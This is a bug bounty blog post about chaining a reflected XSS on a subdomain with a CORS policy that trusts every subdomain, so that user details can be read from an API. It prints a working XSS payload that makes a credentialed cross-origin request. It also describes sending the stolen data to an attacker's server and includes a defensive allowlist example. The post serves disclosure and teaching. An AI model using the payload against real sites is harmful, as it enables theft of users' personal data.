Exploiting CORS Misconfiguration using XSS

Hello All,


This post is about how I exploited a Cross-Origin Resource Sharing (CORS) misconfiguration with the help of Cross-Site Scripting (XSS).


After reporting some bugs to the Netgear Kudos program, I started getting old private program invites on Bugcrowd.

One of them had 300+ researchers and had been running since 2015.

I wasn't happy about that, as I thought:
  1.  I won't be able to find anything, as the program has been running for such a long time and so many others have looked at it before me.
  2.  Even if I find something, the chances of it being a duplicate are high.


But then Osama said this





So I finally started looking at it and trying my best to find something. I got one P3, but it went duplicate :(

But then I found an endpoint that had a simple CORS misconfiguration, and the endpoint was returning user details like email address, age, gender, DOB, etc. in the response.


It was triaged, paid and fixed within a week.

I was happy and was planning to move on to other programs. Sadly, none of them were as interesting as this one.

So I started looking at it again. During my initial recon phase I had found a reflected XSS on their support portal, but that subdomain was out of scope of the program.

I don't know why, but I just bookmarked it   ¯\_(ツ)_/¯

Later I found another endpoint that was also returning user details in the response, but it was only accepting subdomains as the origin.



So in this case there are two options:
  •  Finding XSS on a subdomain (which I already had)
  •  Subdomain takeover

Even after reading these blogs multiple times, I wasn't able to understand the flow of the attack.

After talking to a lot of people, including James Kettle, Daniel Bakker and Kaushal Parikh,

I was finally able to understand what the attack flow would look like:


1.  The attacker sends the XSS link to the user with the following payload:

<p id=demo></p></script><script>
function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {    
    if (this.readyState == 4 && this.status == 200) {    
    alert(this.responseText);     
    document.getElementById("demo").innerHTML = this.responseText;    
    }  
};  
xhttp.open("GET", "https://sub.site.com/api/v2/config", true);  
xhttp.withCredentials = true;  
xhttp.send();
}
cors();
</script>

2. This will send a GET request to site.com with the origin as sub.site.com and then paste the response back into the paragraph tag (in this case).

3. It then sends the data to the attacker's server using JavaScript.
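
On the server side, the condition described above comes from treating every subdomain as a trusted origin for credentialed requests. The following is an added example, not code from the original post or the program: site.com and sub.site.com are the post's placeholders, while app.site.com and the function names are assumptions. It compares that check with an exact-match allowlist.

```javascript
// Added example: server-side Origin checks for a credentialed API response.
// site.com / sub.site.com come from the post; every other name is hypothetical.

// Weak policy (the kind described in the post): any subdomain is trusted.
function weakIsAllowed(origin) {
  return /^https:\/\/([a-z0-9-]+\.)+site\.com$/.test(origin);
}

// Hardened policy: exact-match allowlist of origins that need credentialed reads.
const ALLOWED_ORIGINS = new Set([
  "https://site.com",
  "https://app.site.com", // hypothetical first-party front end
]);

function strictIsAllowed(origin) {
  return typeof origin === "string" && ALLOWED_ORIGINS.has(origin);
}

// Build the CORS response headers for a request's Origin header.
function corsHeaders(origin, isAllowed) {
  const headers = { Vary: "Origin" }; // caches must key on Origin
  if (isAllowed(origin)) {
    headers["Access-Control-Allow-Origin"] = origin;
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers; // no ACAO header: the browser withholds the response from the page
}

// Constructed sample Origin values, run against both policies.
function compare() {
  const samples = [
    "https://app.site.com",
    "https://sub.site.com",      // the subdomain used as origin in the post
    "https://site.com.example",  // look-alike suffix
    "null",
  ];
  return samples.map((o) => ({
    origin: o,
    weak: "Access-Control-Allow-Origin" in corsHeaders(o, weakIsAllowed),
    strict: "Access-Control-Allow-Origin" in corsHeaders(o, strictIsAllowed),
  }));
}

console.table(compare());
```

With the wildcard-subdomain check, the security of the API response is only as good as the least-maintained subdomain; the allowlist limits credentialed reads to origins that actually need them.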




I quickly reproduced it twice just to be sure and submitted the report.

The Bugcrowd analyst replied with this:


So after exchanging a few messages, I was able to convince him, and it was triaged and paid. The client replied with this  ^_^




Lessons learned:

  1.  Just because a program is old and so many people have looked at it, it doesn't mean there is nothing to find.
  2.  XSS is lub <3

While I can't share the original PoC, I have tried to re-create the same scenario on my local machine.
You can get the code from my profile on GitHub.





Thanks for reading. Hopefully we will meet next time with another cool finding :)


--

Regards,
Noman Shaikh

Comments

  1. If my understanding is correct, you are displaying sensitive data from the main site in the subdomain site's <p> tag. Is just displaying sensitive data on the subdomain site an issue?
    How can it be exploited in a real-time scenario?

    1. Just doing that is not an issue.

      But, as we can get sensitive data from the main domain to a subdomain and we have XSS on that subdomain, that is, we can run JavaScript in the context of that site,
      and using JavaScript we can send the data to any server instead of displaying it.

  2. Sir, please provide me the CORS payload